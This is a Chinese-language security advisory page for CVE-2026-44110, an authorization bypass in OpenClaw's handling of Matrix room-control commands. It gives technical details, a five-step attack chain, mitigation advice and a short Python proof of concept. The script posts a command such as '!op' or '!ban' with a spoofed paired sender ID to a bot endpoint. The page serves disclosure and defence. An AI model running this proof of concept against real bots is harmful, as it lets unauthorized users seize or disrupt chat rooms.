CVE-2026-44110 CVSS 8.8 高危

CVE-2026-44110 OpenClaw授权绕过漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44110

漏洞类型

授权绕过

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.15之前版本存在授权绕过漏洞。该漏洞源于Matrix房间控制命令授权机制错误信任DM（直聊）配对存储条目。攻击者若拥有已配对的发送者ID，可通过在bot房间发送消息来绕过允许列表限制，执行房间控制命令，从而触发特权行为。

技术细节

该漏洞发生在OpenClaw处理Matrix房间消息的授权逻辑中。正常情况下，执行控制命令需要用户在预配置的允许列表中。然而，受影响版本的代码在验证权限时，错误地依赖了DM pairing-store（直聊配对存储）中的条目作为信任依据。当攻击者在pairing-store中拥有有效的发送者ID记录时，系统仅检查该ID是否存在于存储中，而未进一步验证该ID当前是否有权在目标房间执行管理操作。攻击者只需向受影响的bot房间发送特定的控制命令消息，Bot解析命令后，使用有缺陷的授权逻辑验证发送者，误以为其具有管理员权限，从而执行命令。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标Matrix房间使用的是易受攻击版本的OpenClaw。

STEP 2

步骤2：验证前置条件

确认攻击者的Matrix ID已存在于OpenClaw的DM pairing-store中（可能通过之前的交互）。

STEP 3

步骤3：发送恶意指令

攻击者向Bot所在的房间发送控制命令（如管理命令）。

STEP 4

步骤4：绕过授权

OpenClaw检查发现发送者ID在pairing-store中，错误地绕过允许列表检查并授权执行。

STEP 5

步骤5：达成攻击

Bot执行特权操作，导致房间被攻击者控制或破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-44110
# This script demonstrates how an attacker with a paired sender ID 
# can execute commands in a room without being in the allowlist.

import requests

def exploit_openclaw(bot_webhook_url, command):
    """
    Exploit the authorization bypass vulnerability.
    :param bot_webhook_url: The API endpoint or simulated message trigger
    :param command: Command to execute (e.g., "!ban @user")
    """
    headers = {'Content-Type': 'application/json'}
    payload = {
        "sender_id": "@attacker:example.com", # ID present in pairing-store
        "room_id": "!targetRoom:example.com",
        "body": command
    }
    
    try:
        response = requests.post(bot_webhook_url, json=payload, headers=headers)
        if response.status_code == 200:
            print(f"[+] Command '{command}' executed successfully.")
        else:
            print(f"[-] Failed to execute command.")
    except Exception as e:
        print(f"Error: {e}")

# Example usage
# exploit_openclaw("http://openclaw-bot/api/message", "!op")

影响范围

OpenClaw < 2026.4.15

防御指南

临时缓解措施

如果无法立即升级，请暂时禁用受影响OpenClaw实例的房间控制功能，或严格审查pairing-store中的配对用户，仅保留完全可信的管理员ID。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表